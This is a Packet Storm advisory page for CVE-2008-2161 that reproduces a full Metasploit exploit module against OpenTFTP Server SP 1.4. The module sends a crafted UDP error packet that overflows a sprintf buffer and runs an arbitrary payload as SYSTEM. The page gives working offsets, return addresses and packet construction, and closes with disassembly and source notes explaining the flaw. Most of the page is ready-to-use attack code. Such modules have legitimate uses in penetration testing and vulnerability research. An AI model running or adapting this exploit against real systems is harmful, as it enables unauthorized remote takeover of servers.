OpenTFTP SP 1.4 Error Packet Overflow

24 Dec 2011 00:00:00 · Reported by tixxDZ · Type: packetstorm · Source: packetstormsecurity.com

OpenTFTP SP 1.4 Buffer Overflow in Error Packet format allows for remote code execution

Related

- Circl: CVE-2008-2161 (8 May 2008 00:00)
- Check Point Advisories: Update Protection against TFTP Server Error Packet Handling Buffer Overflow Vulnerability (8 Aug 2008 00:00)
- Check Point Advisories: TFTP Server Error Packet Handling Buffer Overflow (CVE-2008-2161) (18 Oct 2009 00:00)
- CVE: CVE-2008-2161 (12 May 2008 22:00)
- Cvelist: CVE-2008-2161 (12 May 2008 22:00)
- Metasploit: OpenTFTP SP 1.4 Error Packet Overflow (23 Dec 2011 17:27)
- NVD: CVE-2008-2161 (12 May 2008 22:20)
- Prion: Buffer overflow (12 May 2008 22:20)
- Prion: Heap overflow (23 Dec 2019 23:15)
- RedhatCVE: CVE-2018-10387 (9 Jan 2026 12:18)
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'OpenTFTP SP 1.4 Error Packet Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in OpenTFTP Server SP 1.4. The vulnerable
        condition triggers when the TFTP opcode is set to the error packet type: the TFTP
        service then formats the message with a sprintf() call, which overflows a fixed
        buffer and allows remote code execution in the context of SYSTEM.

          The offset (to EIP) depends on how the TFTP server was started (as a 'Stand Alone'
        process or as a 'Service'). By default the target is set to 'Service' because that is
        the default configuration during OpenTFTP Server SP 1.4's installation.
      },
      'Author'         =>
        [
          'tixxDZ',       # Initial discovery, PoC
          'steponequit'   # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2008-2161'],
          ['BID', '29111'],
          ['URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/29111.pl']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'           => 5000,
          'BadChars'        => "\x00\x0a\x0d",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # .bss section that is overwritten
          [ 'OpenTFTP 1.4 Service',     { 'Ret' => 0x0041b3ab } ],
          [ 'OpenTFTP 1.4 Stand Alone', { 'Ret' => 0x0041b3ab } ]
        ],
      # TFTP server is installed as an NT service by default
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Jul 05 2008'))

    register_options(
      [
        Opt::RPORT(69),
      ], self.class)
  end

  def exploit

    if target.name =~ /OpenTFTP 1.4 Stand Alone/
      # This hits msvcrt.printf()
      sploit  = "\x00\x05" + make_nops(10)
      sploit << payload.encoded
      sploit << rand_text_alpha(20517 - payload.encoded.length)
      sploit << [target['Ret']].pack('V')
      sploit << Rex::Text.rand_text_alpha(1469)

    elsif target.name =~ /OpenTFTP 1.4 Service/
      # This hits time()
      sploit  = "\x00\x05" + make_nops(10)
      sploit << payload.encoded
      sploit << rand_text_alpha(20445 - payload.encoded.length)
      sploit << [target['Ret']].pack('V')
      sploit << Rex::Text.rand_text_alpha(1545)
    end

    # Send the malicious packet
    connect_udp
    udp_sock.put(sploit)
    handler
    disconnect_udp

  end

end

=begin
NOTE: If the module is run on an OSX box, you will probably see this error:
[-] Exploit exception: Message too long
That's OSX for you.

The vulnerable condition triggers when the TFTP opcode "\x00\x05" gets parsed in a ntohs() call:
.text:004022F6 mov eax, ds:dword_41B370
.text:004022FB movzx eax, word ptr [eax]
.text:004022FE mov [esp+5C8h+var_5C8], eax
.text:00402301 mov [ebp+var_550], 0FFFFFFFFh
.text:0040230B call ntohs
.text:00402310 sub esp, 4
.text:00402313 cmp ax, 5
.text:00402317 jnz short loc_40236F
...

When the value matches 0x05, we then head down to a sprintf() call to generate an error
message, which causes an overflow:
.text:00402330 mov eax, ds:dword_41B370
.text:00402335 add eax, 4
.text:00402338 mov [esp+5C8h+var_5BC], eax
.text:0040233C mov [esp+5C8h+var_5C0], edx
.text:00402340 mov [esp+5C8h+var_5C4], offset aErrorIAtClient ; "Error %i at Client, %s"
.text:00402348 mov [esp+5C8h+var_5C8], offset byte_41B394
.text:0040234F call sprintf

And then we either corrupt a msvcrt.printf() or time() call (in logMess), which ends up gaining
control.

In source:
http://pastebin.com/QgZDwcan

else if (ntohs(datain->opcode) == 5) // Line 224
{
    sprintf(serverError.errormessage, "Error %i at Client, %s", ntohs(datain->block), &datain->buffer);
    logMess(req1, 1);
    ..... so on .....

You can also corrupt a SetServiceStatus() call with a smaller buffer, but that obviously doesn't
give you a better crash than this one.
=end
```


Vulners AI Score: 0.6 (Low risk) · EPSS: 0.78902